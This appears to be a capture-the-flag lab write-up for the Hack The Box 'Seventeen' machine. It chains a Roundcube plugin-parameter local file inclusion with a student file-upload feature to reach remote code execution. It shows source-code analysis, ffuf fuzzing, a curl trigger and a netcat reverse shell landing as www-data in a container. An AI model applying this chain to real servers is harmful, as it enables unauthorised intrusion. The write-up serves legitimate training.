LFI to RCE
Referring to the PoC article found online, the vulnerability is present inrcube_plugin_api.php, resulting no input sanitization in the “plugins<PLUGIN_NAME>” parameters, effectively allows attackers to perform LFI
In order to expand the vulnerability further to achieve RCE, the following two conditions must be met
- A PHP file containing a payload
- A directory with the same name as the PHP file (without the extension) It is required that both the PHP file and the directory share the same name
a php file containing a payload can easily be uploaded and controlled (filename) via the student endpoint available at http://seventeen.htb:8000/oldmanagement/student_profile.php
A directory that shares the same name is beyond the scope of my current privilege as the mentioned endpoint doesn’t support directory creation. Therefore, it is critical to find an existing directory in the uploaded file directory and name the PHP payload after it
The issue is that I have yet to find out where the uploaded files are stored
School File Management System
As previously confirmed, the target School File Management System instance supports file upload by student I should be able to abuse this feature to upload a payload here and execute it from the roundcube endpoint
Hovering over the Download button reveals the pointer, but this doesn’t shows where the file is located
Source Code Analysis
Since I don’t know where the uploaded files are stored in the target School File Management System instance, I’d need to check the source code to find out
┌──(kali㉿kali)-[~/htb/labs/seventeen/sfms]
└─$ wget https://www.sourcecodester.com/sites/default/files/download/razormist/school-file-management-system.zip ; unzip -q school-file-management-system.zipthe web application itself is an open source project made by sourcecodester Downloading the source code to Kali
┌──(kali㉿kali)-[~/…/htb/labs/seventeen/sfms]
└─$ ll
total 656K
4.0k drwxr-xr-x 3 kali kali 4.0k jun 20 05:26 .
4.0k drwxr-xr-x 3 kali kali 4.0k jun 20 05:19 ..
644k -rw-r--r-- 1 kali kali 641k jun 20 04:21 school-file-management-system.zip
4.0K drwxr-xr-x 5 kali kali 4.0K Apr 7 2020 'School File Management System'
┌──(kali㉿kali)-[~/…/htb/labs/seventeen/sfms]
└─$ cd School\ File\ Management\ System/ ; ll
total 72K
4.0k drwxr-xr-x 3 kali kali 4.0k jun 20 04:21 ..
4.0K drwxr-xr-x 2 kali kali 4.0K Apr 7 2020 db
4.0K drwxr-xr-x 3 kali kali 4.0K Apr 7 2020 files
8.0K -rw-r--r-- 1 kali kali 6.1K Apr 7 2020 student_profile.php
4.0K -rw-r--r-- 1 kali kali 494 Apr 7 2020 remove_file.php
4.0K -rw-r--r-- 1 kali kali 3.5K Apr 7 2020 student_update.php
4.0K -rw-r--r-- 1 kali kali 986 Apr 7 2020 login.php
4.0K -rw-r--r-- 1 kali kali 568 Apr 7 2020 update_query.php
4.0K drwxr-xr-x 5 kali kali 4.0K Apr 7 2020 .
4.0K -rw-r--r-- 1 kali kali 765 Apr 7 2020 index.php
4.0K -rw-r--r-- 1 kali kali 655 Jan 29 2019 save_file.php
4.0K -rw-r--r-- 1 kali kali 514 Jan 29 2019 download.php
4.0K -rw-r--r-- 1 kali kali 104 Jan 29 2019 validator.php
4.0K -rw-r--r-- 1 kali kali 92 Jan 29 2019 logout.php
4.0K -rw-r--r-- 1 kali kali 278 Jan 29 2019 script.php
4.0K -rw-r--r-- 1 kali kali 597 Jan 29 2019 login_query.php
4.0K drwxr-xr-x 6 kali kali 4.0K Jan 29 2019 adminThe save_file.php file should specify where the web app stores the uploaded files by student
save_file.php
The $location variable is set to files/".$stud_no."/".$file_name
Given the fact that the Kelly Shane’s student number is 31234, it would be /files/31234/$file_name
Now that I know the location of the uploaded files, I need to find an existing directory to match the PHP payload
Fuzzing
┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ ffuf -c -w /usr/share/wordlists/seclists/discovery/web-content/directory-list-2.3-medium.txt -u http://seventeen.htb:8000/oldmanagement/files/31234/FUZZ -ic
________________________________________________
:: Method : GET
:: URL : http://seventeen.htb:8000/oldmanagement/files/31234/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
papers [status: 301, Size: 348, Words: 20, Lines: 10, Duration: 96ms]
:: Progress: [220547/220547] :: Job [1/1] :: 417 req/sec :: Duration: [0:08:55] :: Errors: 0 ::ffuf found a valid directory /paper present in the /files/31234 directory
This means the PHP payload must be named papers.php, to match the directory name
Arbitrary File Upload
The PHP payload has been uploaded to the student endpoint
RCE
LFI can be achieved through the “plugins<PLUGIN_NAME>” parameter with “<PLUGIN_NAME>” being arbitrary
The vulnerable webapp would resolve the above request to /var/www/html/oldmamangement/files/31234/papers.php instead of loading the papers directory. That’s the inclusion bug
┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ curl -s http://seventeen.htb:8000/mastermailer/I can then trigger the payload by loading any endpoint of the web application
┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.165] 43920
socket: Shell has connected! PID: 977
whoami
www-data
hostname
4374220c10d0
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
13: eth0@if14: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:ac:11:00:04 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 172.17.0.4/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft foreverI got the shell session open
Based on the hostname and IP address, I’d assume that I am inside a Docker container
Foothold established to a Docker container as the www-data user